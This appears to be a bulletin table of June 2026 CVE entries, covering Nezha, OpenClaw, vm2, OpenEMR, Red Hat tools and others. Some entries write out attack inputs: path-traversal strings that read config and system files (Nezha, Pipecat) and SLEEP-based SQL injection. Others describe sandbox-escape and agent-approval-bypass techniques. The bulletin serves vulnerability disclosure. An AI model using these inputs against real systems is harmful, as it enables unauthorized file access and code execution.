| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. Prior to version 2.0.13, fallbackToFrontend in the dashboard's NoRoute handler treats any URL whose raw string starts with /dashboard as an admin-frontend asset request. The check uses strings.HasPrefix, not a path-segment match, so the input /dashboard../data/config.yaml is accepted; strings.TrimPrefix leaves ../data/config.yaml; and path.Join("admin-dist", "../data/config.yaml") normalizes to data/config.yaml - which os.Stat finds and http.ServeFile returns. No authentication required. This issue has been patched in version 2.0.13. | 2026-06-12 | 9.1 | CVE-2026-53519 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.4.0 to before version 2.0.8, nezha's dashboard supports two user roles: RoleAdmin (Role==0) and RoleMember (Role==1). The notification routes POST /api/v1/notification and PATCH /api/v1/notification/:id are wired through commonHandler rather than adminHandler - so a RoleMember user can call them. These handlers synchronously Send() an HTTP request to a user-controlled URL and reflect the entire response body (no size limit) back to the caller on any non-2xx response. This issue has been patched in version 2.0.8. | 2026-06-12 | 7.7 | CVE-2026-46717 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.4.0 to before version 2.0.8, a RoleMember can fire other users' cron tasks via AlertRule.FailTriggerTasks (no ownership check). This issue has been patched in version 2.0.8. | 2026-06-12 | 7.1 | CVE-2026-47120 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 0.20.0 to before version 2.0.12, authenticated agents can forge service-monitor results for other users' services. This issue has been patched in version 2.0.12. | 2026-06-12 | 7.1 | CVE-2026-48119 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.0.0 to before version 2.0.14, cross-site GET request can trigger stored cron commands on a victim's agents. This issue has been patched in version 2.0.14. | 2026-06-12 | 7.1 | CVE-2026-49396 |
| NginxProxyManager--nginx-proxy-manager | Nginx Proxy Manager versions 2.9.14 through 2.15.1, fixed in commit a5db5ed, contain an authenticated remote code execution vulnerability via OS command injection in the setupCertbotPlugins() function in backend/setup.js, allowing attackers with certificates:manage permission to execute arbitrary commands by storing a malicious payload in the dns_provider_credentials field. The user-controlled dns_provider_credentials value is interpolated directly into a shell command executed via child_process.exec() without sanitization or escaping, causing the injected command to execute upon backend restart. | 2026-06-08 | 7.5 | CVE-2026-40519 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.4.0, in handle_dht_get() the DhtResults accumulator is only initialized when the first DHT record passes verification. If the first record fails (for example because it came from a malicious DHT node), DhtResults is never created, and all subsequent valid records are discarded with "DHT inconsistent state" errors. This issue has been patched in version 1.4.0. | 2026-06-09 | 7.5 | CVE-2026-46541 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.5.0, a remote, unauthenticated denial-of-service vulnerability in MerkleRadixTrie::put_chunk allows any state-sync peer to crash any node performing state synchronization (freshly joining nodes and recovering nodes). This issue has been patched in version 1.5.0. | 2026-06-09 | 7.5 | CVE-2026-46545 |
| NVIDIA--DALI | NVIDIA DALI contains a vulnerability in a component where an attacker could cause a heap-based buffer overflow. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, and information disclosure. | 2026-06-09 | 7.3 | CVE-2026-24180 |
| NVIDIA--DALI | NVIDIA DALI contains a vulnerability in a component where an attacker could cause an improper index validation. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, and information disclosure. | 2026-06-09 | 7.3 | CVE-2026-24181 |
| Ollie Armstrong--Simply Poll | Simply Poll 1.4.1 plugin for WordPress contains an SQL injection vulnerability that allows unauthenticated attackers to extract database information by injecting SQL code through the 'pollid' POST parameter. Attackers can send requests to the admin-ajax.php endpoint with the 'spAjaxResults' action and malicious 'pollid' values to execute arbitrary SQL queries and read sensitive data from the WordPress database. | 2026-06-09 | 8.2 | CVE-2016-20062 |
| Omnissa--Omnissa Workspace ONE Assist for macOS | Omnissa Workspace ONE® Assist for macOS contains a Local Privilege Escalation Vulnerability. | 2026-06-09 | 7.8 | CVE-2026-22926 |
| open-metadata--OpenMetadata | OpenMetadata is a unified metadata platform. Prior to version 1.12.4, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both the cleartext database password in request.connection.config.password and the ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken. The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs with bot-level privileges. This issue has been patched in version 1.12.4. | 2026-06-08 | 8.3 | CVE-2026-46481 |
| openbullet--openbullet2 | OpenBullet2 through version 0.3.2 contains an authentication bypass vulnerability in the API key authentication middleware that allows unauthenticated attackers to gain admin access by supplying an empty X-Api-Key header value. Attackers can exploit the middleware's comparison of the supplied header against an empty AdminApiKey default string to access the admin console and all API endpoints without valid credentials. | 2026-06-08 | 9.8 | CVE-2026-25555 |
| openbullet--openbullet2 | OpenBullet2 through version 0.3.2 contains a path traversal vulnerability in the wordlist endpoint that allows authenticated attackers to perform arbitrary file read, write, and delete operations by supplying unsanitized absolute paths to the upload handler and wordlist functions. Attackers can chain the file write and delete primitives to achieve remote code execution by manipulating critical system files such as /etc/passwd, with full system impact since the application runs as root by default. | 2026-06-08 | 8.8 | CVE-2026-25559 |
| openbullet--openbullet2 | OpenBullet2 through version 0.3.2 contains a remote code execution vulnerability that allows authenticated users to execute arbitrary commands by uploading script files (.bat, .ps1, .sh) through the FileProxySource proxy loading feature. Attackers can upload malicious script files as proxy sources, causing the server to execute the scripts and return output as proxy lines, resulting in arbitrary command execution on the host as the process user. | 2026-06-08 | 8.8 | CVE-2026-25855 |
| openbullet--openbullet2 | OpenBullet2 through version 0.3.2 contains an authenticated remote code execution vulnerability that allows authenticated users to execute arbitrary C# code on the server host by creating or modifying job configurations. Attackers can leverage the plain C# execution mode, which lacks reference filtering or API restrictions, to access the file system, spawn processes, and invoke arbitrary .NET APIs as the process user. | 2026-06-08 | 8.8 | CVE-2026-25856 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.27 contains a state mutation vulnerability in node pairing reconnection that allows paired nodes to confuse approval scope decisions. Attackers can exploit reconnection logic to restore or present broader node authority than intended, potentially bypassing approval restrictions. | 2026-06-12 | 9.8 | CVE-2026-53838 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.12 contains a shell option parsing vulnerability that allows combined POSIX shell flags to bypass exec revalidation checks. Attackers can exploit this by using combined shell options to execute inline shell content without intended allowlist validation, potentially enabling unauthorized command execution when the affected feature is enabled. | 2026-06-11 | 8.8 | CVE-2026-53806 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.6 contains an authorization bypass vulnerability in Telegram interactive callbacks that allows authenticated users to skip commands.allowFrom validation. Attackers can invoke affected callbacks to mark themselves as authorized senders before allowlist checks are applied, triggering command behavior outside configured Telegram sender restrictions. | 2026-06-11 | 8.8 | CVE-2026-53807 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains a code execution vulnerability where marketplace runtime extension metadata can redirect loading toward unscanned package payloads. Attackers with trusted operator access can manipulate extension metadata to load plugin code outside reviewed package entry points, bypassing security scanning. | 2026-06-11 | 8.8 | CVE-2026-53810 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.7 contains a privilege escalation vulnerability in the Matrix allowFrom feature that allows authenticated accounts to match policy entries through mutable display name metadata. Attackers with the ability to change display names can receive agent access intended for another Matrix identity, potentially gaining unauthorized permissions depending on operator configuration. | 2026-06-11 | 8.8 | CVE-2026-53811 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.20 contains a privilege escalation vulnerability where hook-triggered agent runs incorrectly receive owner-scoped MCP loopback authority instead of hook-appropriate scope. Attackers with a valid hook token can exploit the /hooks/agent endpoint to cause spawned CLI runtimes to access or invoke owner-only MCP tools, potentially executing privileged actions like persistent cron state modifications. | 2026-06-11 | 8.3 | CVE-2026-53814 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.22 contains a locality validation vulnerability in Control UI pairing that allows attackers with network access to spoof locality information and obtain durable admin-capable device tokens. Attackers can exploit insufficient locality-derived trust validation to convert temporary shared access into persistent administrative credentials that survive token rotation. | 2026-06-11 | 8.8 | CVE-2026-53817 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.27 contains an arbitrary code execution vulnerability in skill install flows where workspace .env files can override the Homebrew executable selection. Attackers with access to trusted operator workspaces can execute unintended Homebrew-compatible executables during skill setup to compromise the system. | 2026-06-11 | 8.8 | CVE-2026-53819 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 accepts WebSocket client-declared operator scopes before binding to server-approved pairing or trusted-proxy authorization baseline. Unpaired or restricted trusted-proxy Control UI clients can obtain cached operator.admin authority on live WebSocket connections to execute admin-gated Gateway RPCs. | 2026-06-12 | 8.8 | CVE-2026-53821 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains a command injection vulnerability where shell wrapper argv could change between approval and execution. Attackers can rebuild command arguments after allowlist approval to execute unapproved command shapes, potentially bypassing security controls. | 2026-06-12 | 8.8 | CVE-2026-53822 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.3 contains a privilege escalation vulnerability in the allowFrom feature that binds to mutable Slack display names. Attackers with Slack account access can change display name metadata to match policy entries, potentially gaining unauthorized agent access intended for other identities. | 2026-06-12 | 8.1 | CVE-2026-53823 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.6 contains an authorization bypass vulnerability in native command handling that allows authenticated senders to execute owner-only commands without proper policy enforcement. Attackers can trigger native command handling to bypass the configured owner-command access control, potentially executing privileged commands from unauthorized users. | 2026-06-12 | 8.8 | CVE-2026-53828 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains an approval display truncation vulnerability allowing authenticated users to hide command suffixes from approvers. Attackers can submit oversized exec commands with benign prefixes and malicious suffixes to execute unauthorized operations after approval. | 2026-06-12 | 8 | CVE-2026-53829 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains a policy enforcement vulnerability in system.run safe-bin allowlist validation that allows shell expansion to modify command interpretation on POSIX nodes. Authenticated operators can exploit shell metacharacters in approved commands to read unintended node-local files and expose sensitive configuration data. | 2026-06-12 | 8.3 | CVE-2026-53831 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.12 contains an allowlist bypass vulnerability in PowerShell encoded-command handling that allows attackers to execute encoded commands using abbreviated flag aliases not recognized by the allowlist parser. Remote authenticated operators can bypass execution allowlist checks by using unrecognized encoded-command alias forms to execute arbitrary PowerShell content. | 2026-06-12 | 8.8 | CVE-2026-53836 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains a server-side request forgery vulnerability in browser control that allows authenticated users to bypass private-network navigation checks through Playwright act interactions. Attackers can trigger navigation to private-network targets via action-triggered redirects and subsequently read restricted page content using browser evaluation capabilities. | 2026-06-11 | 7.7 | CVE-2026-53812 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.25 contains a path traversal vulnerability in memory-core artifact loading where workspace state influences local package root resolution. Attackers with access to affected workspaces can load memory-core artifacts from unintended local locations, potentially executing malicious code or accessing sensitive data. | 2026-06-11 | 7.8 | CVE-2026-53813 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains an insufficient provenance validation vulnerability in node event handling that allows paired nodes to forge exec lifecycle events without system.run authorization. A malicious or compromised paired node can send crafted node.event messages to the gateway, steering target sessions into exec-event paths that expose capabilities the reduced node surface should not provide. | 2026-06-11 | 7.2 | CVE-2026-53816 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains an identity header validation vulnerability allowing local same-host callers to forge trusted-proxy identity headers. Attackers with access to the proxy-facing Gateway port can supply forged identity headers to assume operator identity and potentially escalate privileges. | 2026-06-12 | 7.7 | CVE-2026-53832 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.29 contains an authorization bypass vulnerability in the QQBot streaming command that allows authenticated senders to mutate configuration without explicit allowFrom restrictions. Attackers can modify QQBot streaming configuration outside intended admin policy by reaching the affected command without non-wildcard allowlist entry requirements. | 2026-06-12 | 7.7 | CVE-2026-53833 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.27 contains an authorization bypass vulnerability in QQBot pre-dispatch slash commands that allows authenticated senders to skip allowFrom policy checks. Attackers can invoke slash commands before configured access control policies are applied, potentially triggering command handling from blocked senders depending on operator configuration. | 2026-06-12 | 7.5 | CVE-2026-53834 |
| openemr--openemr | OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.1, a stored cross-site scripting vulnerability in the prescription CSS/HTML multi-print feature allows a patient portal user to execute arbitrary JavaScript in a clinician's browser session. Patient demographic fields (name, address) are rendered without output encoding in multiprintcss_header(), and portal patients can write attacker-controlled HTML directly into patient_data by calling the PUT api/patient/:num endpoint, which bypasses the intended audit review workflow. Because the XSS fires in the clinician's authenticated session on the main OpenEMR interface, the attacker can access CSRF tokens, session data, and perform actions as the clinician - crossing the patient-to-clinician trust boundary. This issue has been patched in version 8.0.0.1. | 2026-06-09 | 7.7 | CVE-2026-46518 |
| Oracle Corporation--PeopleSoft Enterprise PeopleTools | Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Updates Environment Management). Supported versions that are affected are 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in takeover of PeopleSoft Enterprise PeopleTools. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). | 2026-06-11 | 9.8 | CVE-2026-35273 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, by combining Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"), Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"), and Node.js's ERR_INVALID_ARG_TYPE Error, the host's TypeError constructor can be obtained, which allows the escape from the sandbox. This allows attackers to run arbitrary code. This issue has been patched in version 3.11.4. | 2026-06-12 | 10 | CVE-2026-47131 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, the fix for GHSA-8hg8-63c5-gwmx (CVE-2023-37903) introduced a check in nodevm.js line 263 that blocks the combination nesting: true + require: false. However, the check uses strict equality (options.require === false), which is trivially bypassed by omitting the require option entirely. When require is not specified, options.require is undefined, not false. The strict equality check fails, so the security guard is skipped. Immediately after (line 280), the destructuring default require: requireOpts = false assigns requireOpts = false, producing the exact configuration the patch was designed to prevent. This issue has been patched in version 3.11.4. | 2026-06-12 | 10 | CVE-2026-47137 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, NodeVM blocks several dangerous Node.js builtins such as module, worker_threads, cluster, vm, repl, and inspector. However, the denylist misses process and inspector/promises. Both can be used from sandboxed code to reach host-side execution primitives. This allows sandboxed code to bypass the intended builtin restrictions and execute code in the host process. This issue has been patched in version 3.11.4. | 2026-06-12 | 10 | CVE-2026-47140 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.4. | 2026-06-12 | 10 | CVE-2026-47208 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, a sandbox escape vulnerability in vm2 allows arbitrary code execution in the host process when untrusted code is executed with async support on runtimes exposing WebAssembly JSPI (WebAssembly.promising / WebAssembly.Suspending). In the tested configuration, a JSPI-backed Promise can reach Promise.prototype.finally() in a way that bypasses the expected Promise-species hardening and exposes a host-originated rejection object to attacker-controlled species logic, breaking the sandbox boundary. This issue has been patched in version 3.11.4. | 2026-06-12 | 9.8 | CVE-2026-47210 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, Symbol.for override in setup-sandbox.js only intercepts 2 of 9 dangerous Node.js cross-realm symbols. Combined with the bridge's set/defineProperty/deleteProperty traps having no isDangerousCrossRealmSymbol key check, sandbox code can obtain real cross-realm symbols, write them to host objects, and control host-side behavior - verified with a full util.promisify hijack chain. This issue has been patched in version 3.11.4. | 2026-06-12 | 8.7 | CVE-2026-47135 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, NodeVM supports excluding public network builtins from the wildcard builtin option. With this configuration direct access to http, https, http2, net, dgram, tls, dns, and dns/promises is blocked. However, Node.js also exposes underscored internal HTTP builtins such as _http_client and _http_server. These are not blocked when the public modules are excluded. Sandboxed code can use these internal builtins to make outbound HTTP requests and open listening HTTP sockets even though the public network modules are denied. This issue has been patched in version 3.11.4. | 2026-06-12 | 8.6 | CVE-2026-47139 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, the BaseHandler.set trap in bridge.js (line 1231) ignores the receiver parameter and unconditionally writes to the host target object. Per the Proxy set trap specification, when receiver !== proxy (e.g., when a child object inherits from the proxy via Object.create), the property assignment should create an own property on the receiver, not on the proxy target. The current implementation always calls otherReflectSet(object, key, value) against the host target, causing all inherited property writes to leak through to the host object. This bug provides an alternative attack vector for writing dangerous cross-realm Symbol keys (e.g., nodejs.util.promisify.custom) to host objects, bypassing any future per-trap isDangerousCrossRealmSymbol guard on the direct set path. This issue has been patched in version 3.11.4. | 2026-06-12 | 8.6 | CVE-2026-47209 |
| PbootCMS--PbootCMS | A security flaw has been discovered in PbootCMS up to 3.2.12. This vulnerability affects the function retrieve of the file apps/home/controller/MemberController.php of the component Password Handler. The manipulation of the argument username/password/email/checkcode results in weak password recovery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-12 | 7.3 | CVE-2026-12066 |
| PerryTS--perry | Perry before 0.5.1159 contains a path traversal vulnerability that allows a malicious build server to write arbitrary content to any location writable by the running process by supplying unsanitized path components in the artifact_name field of ArtifactReady WebSocket messages. Attackers controlling the server URL can deliver traversal payloads through the artifact_name or download_path fields, causing the client to overwrite sensitive files or expose arbitrary local files to an attacker-accessible location. | 2026-06-11 | 8.1 | CVE-2026-53777 |
| php--frankenphp | FrankenPHP is a modern application server for PHP. From version 1.11.2 to before version 1.12.3, the splitPos() function in cgi.go misuses golang.org/x/text/search with search.IgnoreCase when the request path contains a non-ASCII byte. Two distinct flaws in that fallback let an attacker mislead FrankenPHP into treating a non-.php file as a .php script. In any deployment where the attacker can place content into a file served by FrankenPHP (uploads, file storage, etc.), this can be escalated to remote code execution by crafting a URL whose path triggers either flaw. This issue has been patched in version 1.12.3. | 2026-06-10 | 8.1 | CVE-2026-45062 |
| pi-hole--FTL | Pi-hole FTL is the core engine of the Pi-hole network-level advertisement and tracker blocker. Prior to version 6.6.1, Pi-hole FTL contains a race condition vulnerability in the HTTP session management subsystem, introduced with the v6.0 rewrite of the embedded CivetWeb-based web server. This issue has been patched in version 6.6.1. | 2026-06-10 | 8.8 | CVE-2026-44693 |
| pipecat-ai--pipecat | Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. From version 0.0.90 to before version 1.2.0, a path traversal vulnerability exists in Pipecat's development runner (src/pipecat/runner/run.py). When the runner is started with the --folder flag, it exposes a GET /files/{filename:path} download endpoint. The filename path parameter is concatenated directly onto args.folder with no containment check. Starlette normalises literal ../ sequences in URLs, but %2F-encoded slashes bypass this normalisation: the path parameter is URL-decoded after routing, so ..%2F..%2Fetc%2Fpasswd resolves to a path two levels above args.folder. An attacker with network access to the runner can read any file the pipecat process has permission to access - including SSH private keys, credentials, and system files - with a single unauthenticated HTTP request. This issue has been patched in version 1.2.0. | 2026-06-09 | 7.5 | CVE-2026-44716 |
| plasmatizemedia--Recover Exit For WooCommerce | The Recover Exit For WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to and including 1.0.3. This is due to insufficient validation and sanitization of the user-controlled `tpf` POST parameter before it is used in an `include()` path in the `recover_exit()` function. This makes it possible for unauthenticated attackers to perform path traversal and include unintended local PHP files, which can lead to sensitive information exposure and, in certain deployment chains, code execution. | 2026-06-09 | 8.1 | CVE-2026-9662 |
| QuanticaLabs--Car Park Booking System | WordPress Car Park Booking Plugin version 13 October 17 contains a time-based SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the space_id parameter. Attackers can send GET requests to the booking-page endpoint with malicious space_id values using AND SLEEP() payloads to extract sensitive database information. | 2026-06-09 | 8.2 | CVE-2017-20243 |
| Rapid7--Velociraptor | A YAML injection vulnerability exists in the Windows.Collectors.Remapping artifact of Rapid7 Velociraptor before version 0.76.6. The hostname field in client_info.json inside a collection ZIP is inserted into a YAML template via Go's text/template without escaping. An attacker providing a crafted collection ZIP can leverage literal double quotes and newlines in the hostname to break out of the YAML quoted string and inject a new mount remapping entry. When an analyst applies the generated remapping file with --remap, arbitrary VQL executes on their machine with NullACLManager (all permissions granted, unsandboxed). | 2026-06-09 | 7.8 | CVE-2026-8795 |
| raszi--node-tmp | tmp is a temporary file and directory creator for node.js. In version 0.2.6, the _assertPath guard added to tmp rejects only string values that contain the substring `..`. It is bypassed when prefix, postfix, or template is supplied as a non-string value (Array, Buffer, or any object) whose includes('..') returns falsy but whose stringification still contains ../. The value flows through Array.prototype.join/String coercion inside _generateTmpName and path.join(tmpDir, opts.dir, name), producing a final path that escapes tmpdir and creates a file or directory at an attacker-controlled location with the host process's privileges. This affects any application that forwards untrusted request data (a common pattern is JSON body fields or qs-parsed bracket-array query strings such as ?prefix[]=...) into tmp.file, tmp.fileSync, tmp.dir, tmp.dirSync, tmp.tmpName, or tmp.tmpNameSync without explicit type coercion. This vulnerability is fixed in 0.2.7. | 2026-06-11 | 8.2 | CVE-2026-49982 |
| Red Hat Inc--Migration-Agent | A flaw was found in assisted-migration-agent. The application hardcodes insecure Transport Layer Security (TLS) connections when communicating with vCenter. This vulnerability allows a Man-in-the-Middle (MITM) attacker to intercept and harvest vCenter administrator credentials. This can lead to unauthorized access to vCenter. | 2026-06-10 | 9.3 | CVE-2026-53475 |
| Red Hat Inc--Migration-Agent | A flaw was found in assisted-migration-agent. An unauthenticated attacker, located on the same local area network (LAN), can exploit a path traversal vulnerability. By crafting a specially designed gzipped tarball, the attacker can bypass security checks and write arbitrary files to the system. This could ultimately lead to the execution of unauthorized code on the appliance. | 2026-06-10 | 9.6 | CVE-2026-53476 |
| Red Hat Inc--Migration-Planner | A flaw was found in migration-planner. An authenticated user can exploit this vulnerability by sending a DELETE request to the /api/v1/sources route, which lacks proper authorization and filtering. This allows for the destruction of all customer data, including sources, agents, and assessments, leading to a critical loss of availability and integrity across the entire SaaS platform. | 2026-06-10 | 9.1 | CVE-2026-53469 |
| Red Hat Inc--Migration-Planner | A flaw was found in migration-planner. An authenticated attacker could exploit an improper access control vulnerability in the `/api/v1/sources/{id}/image-url` endpoint. This flaw allows the attacker to bypass an ownership check and obtain presigned S3 URLs for Open Virtual Appliance (OVA) images belonging to other users. Consequently, the attacker can download OVA images containing sensitive information, such as long-lived agent JSON Web Tokens (JWTs) and source configurations, potentially leading to unauthorized access and modification of the victim's source. | 2026-06-10 | 9.6 | CVE-2026-53470 |
| Red Hat Inc--Migration-Planner | A flaw was found in migration-planner. The agent-API middleware processes JSON Web Tokens (JWTs) for authentication, but its UpdateSourceInventory and UpdateAgentStatus handlers fail to validate the source_id claim within these tokens against the requested source ID. This oversight allows an authenticated attacker with a valid agent token to manipulate data across different tenants, leading to a complete collapse of tenant isolation. This could result in unauthorized overwriting of victim inventory, planting of malicious credential URLs, or corruption of migration assessments. | 2026-06-10 | 9.6 | CVE-2026-53471 |
| Red Hat Inc--Migration-Planner | A flaw was found in migration-planner. A remote authenticated attacker could exploit this vulnerability by uploading a specially crafted RVTools .xlsx file. Due to improper input sanitization, malicious SQL embedded within a spreadsheet cell is executed when cluster names are processed. This SQL Injection allows for arbitrary file reading on the system, potentially exposing sensitive information such as Kubernetes service account tokens and other credentials, which could lead to a full compromise of the SaaS environment. | 2026-06-10 | 9.6 | CVE-2026-53474 |
| Red Hat Inc--Migration-Planner-ui-app | A flaw was found in migration-planner-ui-app. An attacker can register a malicious discovery agent with a specially crafted credentialUrl containing JavaScript code. When an organizational user clicks this link in the user interface, the embedded malicious code executes within the user's browser session. This cross-site scripting (XSS) vulnerability allows the attacker to compromise the victim's Red Hat Single Sign-On (SSO) session, potentially leading to unauthorized cross-tenant data access and API actions. | 2026-06-10 | 7.3 | CVE-2026-53473 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. A limited administrator can exploit an improper access control vulnerability in the POST /admin/realms/{realm}/partialImport endpoint. This allows them to bypass Fine-Grained Admin Permissions (FGAP) and escalate their privileges to a full realm administrator by importing users with realm-admin role mappings. | 2026-06-08 | 7.2 | CVE-2026-11577 |
| Red Hat--Red Hat Directory Server 11 | An integer overflow flaw was found in the SASL I/O layer of 389 Directory Server (389-ds-base). In sasl_io_start_packet(), adding sizeof(uint32_t) to a crafted SASL packet length prefix of 0xFFFFFFFC causes unsigned wraparound to zero, bypassing the nsslapd-maxsasliosize limit and leading to a heap buffer overflow of up to approximately 2 megabytes of attacker-controlled data. After a successful SASL bind with integrity protection (SSF > 0), a remote attacker can cause a Denial of Service (DoS) or achieve Remote Code Execution (RCE). In FreeIPA and Red Hat Identity Management deployments, any domain user with a valid Kerberos ticket, enrolled host, or service account can trigger this vulnerability over the network. This flaw is independent of CVE-2025-14905, which patched schema.c only and did not modify sasl_io.c. | 2026-06-11 | 7.6 | CVE-2026-11774 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in dracut. A remote attacker on the adjacent network can exploit this vulnerability by providing specially crafted DHCP (Dynamic Host Configuration Protocol) options, such as a malicious hostname, to a system using dracut's legacy DHCP path. These options are improperly handled and written into temporary shell scripts without proper escaping, leading to command injection. This allows the attacker to achieve root code execution within the initramfs, potentially compromising the system's boot and network behavior. | 2026-06-10 | 8.8 | CVE-2026-6893 |
| Red Hat--Red Hat Enterprise Linux 10 | A local privilege escalation vulnerability was found in the ansible.posix authorized_key module. The module's keyfile() function uses os.chown() instead of os.lchown() and opens files without O_NOFOLLOW when managing SSH authorized keys. An unprivileged local user can pre-stage symbolic links in their ~/.ssh directory to redirect file ownership changes to arbitrary system paths when an operator runs the authorized_key task as root, leading to local privilege escalation. | 2026-06-10 | 7.3 | CVE-2026-11837 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Samba's WINS server component when running as an Active Directory Domain Controller. The WINS protocol handlers for certain request types did not properly validate incoming packets, allowing an unauthenticated remote attacker to trigger a NULL pointer dereference and crash the WINS service using specially crafted UDP packets. | 2026-06-08 | 7.5 | CVE-2026-3238 |
| Red Hat--Red Hat Enterprise Linux 6 | A time-of-check time-of-use (TOCTOU) race condition was found in the abrt-dbus D-Bus service's SetElement method. Between dump directory creation and post-create event execution, any local user can call SetElement to write arbitrary text files into the root-owned dump directory, bypassing package validation and allowing crashes of unpackaged binaries to survive post-create processing. | 2026-06-13 | 7.8 | CVE-2026-54228 |
| Red Hat--Red Hat Enterprise Linux 6 | A race condition was found in the abrt-dbus D-Bus service's ChownProblemDir method. ChownProblemDir opens the dump directory with DD_OPEN_READONLY and calls dd_chown to change ownership of all files to the caller's uid, succeeding even while post-create event handlers hold a write lock. This allows an attacker to gain filesystem-level control of the dump directory while privileged event scripts are still running. | 2026-06-13 | 7 | CVE-2026-54229 |
| Red Hat--Red Hat Enterprise Linux 6 | A symlink following vulnerability was found in the ABRT post-create event handler scripts in libreport. Event scripts write output files using shell redirections without the O_NOFOLLOW flag. If the target file is replaced with a symlink, the shell process running as root follows the symlink and writes content to the symlink target, allowing arbitrary file overwrites on the system. | 2026-06-13 | 7 | CVE-2026-54230 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, PUT /smon/check (app/routes/smon/routes.py:117-138) gates only on roxywi_common.check_user_group_for_flask() - which validates that the caller has some group, not that the target check_id belongs to it. The downstream SQL update functions update_smon, update_smonHttp, update_smonTcp, update_smonPing, update_smonDns (app/modules/db/smon.py:515-562) all execute WHERE smon_id = ? with no user_group filter. The DELETE path is correctly filtered (app/modules/db/smon.py:319-327 does WHERE id = ? AND user_group = ?), demonstrating that the maintainers know the right pattern but did not apply it on UPDATE. Therefore any authenticated user can iterate over smon_id values and silently rewrite any other tenant's HTTP / TCP / Ping / DNS monitoring check. At time of publication, there are no publicly available patches. | 2026-06-10 | 9.1 | CVE-2026-45550 |
